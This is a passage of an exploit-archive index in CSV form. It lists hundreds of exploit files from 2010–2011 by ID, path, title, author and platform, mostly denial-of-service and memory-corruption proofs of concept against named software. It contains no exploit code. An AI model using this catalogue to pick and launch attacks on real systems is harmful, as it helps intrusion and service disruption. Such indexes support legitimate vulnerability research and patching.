6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",dos,multiple, +15262,exploits/windows/dos/15262.txt,"Microsoft Office - 'HtmlDlgHelper' Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",dos,windows, +15267,exploits/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,dos,windows, +15273,exploits/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,dos,multiple, +15283,exploits/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,dos,windows, +15302,exploits/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service",2010-10-22,"MOHAMED ABDI",dos,windows, +15301,exploits/windows/dos/15301.pl,"Altova DatabaseSpy 2011 - Project File Handling Buffer Overflow",2010-10-21,LiquidWorm,dos,windows, +15293,exploits/linux/dos/15293.txt,"LibSMI smiGetNode - Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",dos,linux, +15297,exploits/windows/dos/15297.txt,"Microsoft Windows Mobile 6.1/6.5 - Double-Free Denial of Service",2010-10-21,"musashi karak0rsan",dos,windows, +15305,exploits/windows/dos/15305.pl,"RarmaRadio 2.53.1 - '.m3u' Denial of Service",2010-10-23,anT!-Tr0J4n,dos,windows, +15306,exploits/win_x86/dos/15306.pl,"AnyDVD 6.7.1.0 - Denial of Service",2010-10-23,Havok,dos,win_x86, +15319,exploits/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,dos,windows, +15334,exploits/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",dos,windows, +15426,exploits/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15341,exploits/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",dos,multiple, +15342,exploits/multiple/dos/15342.html,"Mozilla Firefox - Simplified Memory Corruption (PoC)",2010-10-28,extraexploit,dos,multiple, +15346,exploits/multiple/dos/15346.c,"Platinum SDK Library - POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,dos,multiple, +15356,exploits/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",dos,windows, +15378,exploits/windows/dos/15378.py,"Sybase Advantage Data Architect - '.SQL' Format Heap Overflow",2010-11-01,d0lc3,dos,windows, +15380,exploits/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service",2010-11-01,chap0,dos,hardware, +15383,exploits/windows/dos/15383.c,"Rising - 'RSNTGDI.sys' Local Denial of Service",2010-11-02,ze0r,dos,windows, +15384,exploits/windows/dos/15384.c,"AVG Internet Security 9.0.851 - Local Denial of Service",2010-11-02,"Nikita Tarakanov",dos,windows, +15394,exploits/windows/dos/15394.txt,"Maxthon 3.0.18.1000 - CSS Denial of Service",2010-11-02,4n0nym0us,dos,windows, +15393,exploits/windows/dos/15393.pl,"Quickzip 5.1.8.1 - Denial of Service",2010-11-02,moigai,dos,windows, +15407,exploits/windows/dos/15407.txt,"Avira Premium Security Suite - 'NtCreateKey' Race Condition",2010-11-03,"Nikita Tarakanov",dos,windows, +15408,exploits/windows/dos/15408.html,"Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service",2010-11-03,"Matthew Bergin",dos,windows, +15411,exploits/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,dos,windows, +15418,exploits/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,anonymous,dos,windows, +15419,exploits/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,dos,windows, +15420,exploits/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",dos,windows, +15422,exploits/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Denial of Service",2010-11-05,wingthor,dos,windows, +15428,exploits/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,dos,multiple, +15429,exploits/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,dos,windows, +15431,exploits/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",dos,php, +15432,exploits/windows/dos/15432.html,"LeadTools 11.5.0.9 - 'ltisi11n.ocx' DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15433,exploits/windows/dos/15433.html,"LeadTools 11.5.0.9 - 'ltlst11n.ocx' Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15434,exploits/windows/dos/15434.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15435,exploits/windows/dos/15435.html,"LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15436,exploits/windows/dos/15436.html,"LeadTools 11.5.0.9 - 'ltdlg11n.ocx' Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",dos,windows, +15444,exploits/windows/dos/15444.txt,"G Data TotalCare 2011 - 'NtOpenKey' Race Condition",2010-11-06,"Nikita Tarakanov",dos,windows, +15494,exploits/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,dos,windows, +15495,exploits/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,dos,windows, +15458,exploits/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,dos,windows, +15463,exploits/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux, +15464,exploits/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",dos,linux, +15467,exploits/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",dos,multiple, +15474,exploits/multiple/dos/15474.txt,"IBM OmniFind - Buffer Overflow",2010-11-09,"Fatih Kilic",dos,multiple, +15476,exploits/multiple/dos/15476.php,"IBM OmniFind Crawler - Denial of Service",2010-11-09,"Fatih Kilic",dos,multiple, +15482,exploits/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow",2010-11-10,PoisonCode,dos,windows, +15491,exploits/osx/dos/15491.txt,"Apple Directory Services - Memory Corruption",2010-11-11,"Rodrigo Rubira",dos,osx, +15493,exploits/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - '.wav' Buffer Overflow",2010-11-12,anT!-Tr0J4n,dos,windows, +15504,exploits/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",dos,hardware, +15508,exploits/hardware/dos/15508.txt,"Camtron CMNC-200 IP Camera - Denial of Service",2010-11-13,"Trustwave's SpiderLabs",dos,hardware, +15514,exploits/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,dos,windows, +15558,exploits/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,dos,multiple, +15580,exploits/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,dos,windows, +15581,exploits/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,dos,windows, +15582,exploits/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,dos,windows, +15583,exploits/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,dos,windows, +15613,exploits/windows/dos/15613.py,"NCH Officeintercom 5.20 - Remote Denial of Service",2010-11-25,"xsploited security",dos,windows, +15619,exploits/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",dos,linux, +15622,exploits/linux/dos/15622.c,"Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",dos,linux, +15628,exploits/windows/dos/15628.py,"Hanso Player 1.4.0 - '.m3u' Denial of Service",2010-11-28,anT!-Tr0J4n,dos,windows, +15632,exploits/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",dos,windows, +15635,exploits/windows/dos/15635.py,"Provj 5.1.5.5 - '.m3u' Buffer Overflow (PoC)",2010-11-30,0v3r,dos,windows, +16012,exploits/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",dos,windows, +15649,exploits/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - Null Pointer Dereference Denial of Service",2010-12-01,Pepelux,dos,windows, +15657,exploits/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service",2010-12-02,h1ch4m,dos,windows, +15669,exploits/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - '.mp3' Buffer Overflow (PoC)",2010-12-04,0v3r,dos,windows, +15670,exploits/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,dos,windows, +15671,exploits/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,dos,windows, +15674,exploits/windows/dos/15674.rb,"TFTPUtil GUI 1.4.5 - Denial of Service (Metasploit)",2010-12-04,"Vuk Ivanovic",dos,windows, +15676,exploits/multiple/dos/15676.txt,"Wireshark - LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",dos,multiple, +15694,exploits/windows/dos/15694.txt,"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",dos,windows, +15695,exploits/windows/dos/15695.txt,"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",dos,windows, +15697,exploits/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE Denial of Service",2010-12-06,Dr_IDE,dos,windows, +15698,exploits/windows/dos/15698.html,"Flash Player - 'Flash6.ocx' AllowScriptAccess Denial of Service (PoC)",2010-12-06,Dr_IDE,dos,windows, +15705,exploits/linux/dos/15705.txt,"GNU InetUtils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,dos,linux, +15707,exploits/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",dos,multiple, +15708,exploits/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,dos,windows, +15722,exploits/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",dos,multiple, +15803,exploits/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",dos,windows, +15738,exploits/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows, +15739,exploits/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,dos,windows, +15750,exploits/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service Vulnerabilities",2010-12-16,modpr0be,dos,windows, +15758,exploits/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",dos,win_x86, +15767,exploits/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",dos,windows, +15786,exploits/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,dos,windows, +15787,exploits/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,dos,windows, +15788,exploits/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,dos,windows, +15792,exploits/hardware/dos/15792.php,"Apple iOS Safari - body alink Remote Crash",2010-12-20,"Yakir Wizman",dos,hardware, +15794,exploits/hardware/dos/15794.php,"Apple iOS Safari - 'decodeURI' Remote Crash",2010-12-20,"Yakir Wizman",dos,hardware, +15796,exploits/hardware/dos/15796.php,"Apple iOS Safari - 'decodeURIComponent' Remote Crash",2010-12-21,"Yakir Wizman",dos,hardware, +15805,exploits/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",dos,hardware, +15821,exploits/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,dos,windows, +15839,exploits/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,dos,windows, +15845,exploits/windows/dos/15845.py,"IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,dos,windows, +15851,exploits/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,dos,windows, +15860,exploits/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2)",2010-12-29,emgent,dos,windows, +15894,exploits/windows/dos/15894.c,"Microsoft Windows - Class Handling (MS10-073)",2011-01-02,"Tarjei Mandt",dos,windows, +15897,exploits/windows/dos/15897.py,"Music Animation Machine MIDI Player - Local Crash (PoC)",2011-01-03,c0d3R'Z,dos,windows, +15898,exploits/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",dos,multiple, +15905,exploits/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,dos,windows, +15925,exploits/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service",2011-01-07,freak_out,dos,windows, +15935,exploits/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",dos,linux, +15940,exploits/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - RDS Service Remote Denial of Service",2011-01-08,Pepelux,dos,windows, +15946,exploits/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,dos,windows, +15959,exploits/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,dos,windows, +15973,exploits/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",dos,multiple, +15974,exploits/linux/dos/15974.txt,"Mono/Moonlight Generic Type Argument - Privilege Escalation",2011-01-11,"Chris Howie",dos,linux, +15986,exploits/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service",2011-01-13,"Craig Freyman",dos,windows, +15988,exploits/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication",2011-01-14,"Jeremy Brown",dos,windows, +15992,exploits/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",dos,windows, +15998,exploits/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service",2011-01-16,MJ0011,dos,windows, +16002,exploits/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,dos,windows, +16021,exploits/windows/dos/16021.c,"Look n stop - Local Denial of Service",2011-01-21,Heurs,dos,windows, +16022,exploits/windows/dos/16022.c,"Panda Global Protection 2010 - Local Denial of Service",2011-01-21,Heurs,dos,windows, +16023,exploits/windows/dos/16023.c,"Panda Global Protection 2010 - Local Denial of Service (unfiltered wcscpy())",2011-01-21,Heurs,dos,windows, +16035,exploits/windows/dos/16035.py,"Inetserv 3.23 - SMTP Denial of Service",2011-01-23,G13,dos,windows, +16038,exploits/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,dos,windows, +16040,exploits/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)",2011-01-25,"Jeremy Brown",dos,windows, +16042,exploits/windows/dos/16042.rb,"Opera Web Browser 11.00 - Integer Overflow",2011-01-25,"C4SS!0 G0M3S",dos,windows, +16064,exploits/bsd/dos/16064.c,"FreeBSD 8.0 - Local Forced Reboot (Denial of Service)",2011-01-28,kingcope,dos,bsd, +16068,exploits/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",dos,hardware, +16079,exploits/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",dos,multiple, +16084,exploits/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",dos,windows, +16095,exploits/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",dos,linux, +16108,exploits/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption",2011-02-03,"Harry Sintonen",dos,multiple, +16120,exploits/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,dos,windows, +16121,exploits/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,dos,windows, +16129,exploits/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,dos,linux, +16166,exploits/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,dos,windows, +16150,exploits/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",dos,windows, +16180,exploits/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,dos,windows, +16182,exploits/linux/dos/16182.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",dos,linux, +16193,exploits/windows/dos/16193.pl,"Avira AntiVir - '.QUA' File 'avcenter.exe' Local Crash (PoC)",2011-02-19,KedAns-Dz,dos,windows, +16204,exploits/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,dos,windows, +16190,exploits/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows, +16191,exploits/windows/dos/16191.pl,"Novell ZenWorks 10/11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,windows, +16192,exploits/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",dos,linux, +16254,exploits/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,dos,windows, +16203,exploits/windows/dos/16203.txt,"WinMerge 2.12.4 - Project File Handling Stack Overflow",2011-02-22,LiquidWorm,dos,windows, +16216,exploits/linux/dos/16216.txt,"RedHat Linux - Stickiness of /tmp",2011-02-23,"Tavis Ormandy",dos,linux, +16230,exploits/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",dos,windows, +16234,exploits/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",dos,netware, +16237,exploits/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)",2011-02-24,badc0re,dos,windows, +16248,exploits/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,dos,windows, +16255,exploits/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,dos,windows, +16260,exploits/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,dos,windows, +16261,exploits/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Remote Denial of Service",2011-02-28,"_ikki & paradoxengine",dos,multiple, +16262,exploits/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",dos,windows, +16263,exploits/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,dos,linux, +16270,exploits/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",dos,linux, +16284,exploits/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,dos,unix, +16365,exploits/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)",2010-08-30,Metasploit,dos,windows, +41793,exploits/multiple/dos/41793.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",dos,multiple, +16657,exploits/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,dos,aix, +41798,exploits/macos/dos/41798.c,"Apple macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",dos,macos, +16790,exploits/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,dos,windows,8080 +16929,exploits/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,dos,aix, +16939,exploits/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",dos,multiple, +16943,exploits/windows/dos/16943.pl,"Movavi VideoSuite 8.0 Slideshow - '.jpg' Local Crash (PoC)",2011-03-08,KedAns-Dz,dos,windows, +16944,exploits/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor - '.avi' Local Crash (PoC)",2011-03-08,KedAns-Dz,dos,windows, +16945,exploits/hardware/dos/16945.pl,"Nokia N97 - '.m3u' Playlist Crash (PoC)",2011-03-08,KedAns-Dz,dos,hardware, +16952,exploits/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)",2011-03-10,zx2c4,dos,linux, +16960,exploits/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,dos,linux, +16966,exploits/linux/dos/16966.php,"PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service",2011-03-12,"Jose Carlos Norte",dos,linux, +16973,exploits/linux/dos/16973.c,"Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak",2011-03-14,prdelka,dos,linux, +16979,exploits/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,dos,windows, +16986,exploits/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,dos,windows, +16996,exploits/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",dos,windows, +17004,exploits/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate Null Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",dos,linux, +17019,exploits/windows/dos/17019.txt,"RealPlayer 14.0.1.633 - Heap Overflow",2011-03-21,"Luigi Auriemma",dos,windows, +17020,exploits/netware/dos/17020.py,"Novell Netware - NWFTPD.NLM DELE Remote Code Execution",2011-03-21,"Francis Provencher",dos,netware, +17021,exploits/windows/dos/17021.py,"SpoonFTP 1.2 - RETR Denial of Service",2011-03-21,"C4SS!0 G0M3S",dos,windows, +17023,exploits/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",dos,windows, +17025,exploits/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",dos,windows, +17032,exploits/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,dos,windows, +17033,exploits/windows/dos/17033.py,"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities",2011-03-23,"Jeremy Brown",dos,windows, +17045,exploits/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - Denial of Service",2011-03-24,"Craig Freyman",dos,windows,69 +17070,exploits/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service",2011-03-29,"AutoSec Tools",dos,windows, +17071,exploits/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI Denial of Service (PoC)",2011-03-29,BraniX,dos,windows, +17072,exploits/windows/dos/17072.py,"Microsoft Windows Explorer 6.0.2900.5512 - 'Shmedia.dll 6.0.2900.5512' AVI Preview Denial of Service (PoC)",2011-03-29,BraniX,dos,windows, +17074,exploits/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,dos,windows, +17075,exploits/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,dos,windows, +17145,exploits/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",dos,windows, +17087,exploits/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,dos,windows, +17089,exploits/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,dos,windows, +17097,exploits/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated Kernel Memory Corruption",2011-04-01,"Tavis Ormandy",dos,bsd, +17120,exploits/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption",2011-02-25,"Simon Berry-Byrne",dos,multiple, +17133,exploits/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",dos,windows, +17140,exploits/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",dos,multiple, +17142,exploits/windows/dos/17142.py,"IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,dos,windows, +17143,exploits/windows/dos/17143.py,"IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,dos,windows, +17159,exploits/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 - Denial of Service",2011-04-12,"Luigi Auriemma",dos,windows, +17160,exploits/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",dos,windows, +17161,exploits/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 - Heap Overflow",2011-04-12,"Luigi Auriemma",dos,windows, +17162,exploits/windows/dos/17162.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (2)",2011-04-12,"Luigi Auriemma",dos,windows, +17163,exploits/windows/dos/17163.txt,"Microsoft Reader 2.1.1.3143 - Array Overflow",2011-04-12,"Luigi Auriemma",dos,windows, +17164,exploits/windows/dos/17164.txt,"Microsoft Reader 2.1.1.3143 - Null Byte Write",2011-04-12,"Luigi Auriemma",dos,windows, +17188,exploits/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",dos,windows, +17201,exploits/multiple/dos/17201.php,"PHP 'phar' Extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",dos,multiple, +17222,exploits/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,dos,linux, +17227,exploits/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,dos,windows, +17266,exploits/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",dos,windows, +17278,exploits/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,dos,windows, +17273,exploits/windows/dos/17273.c,"Symantec 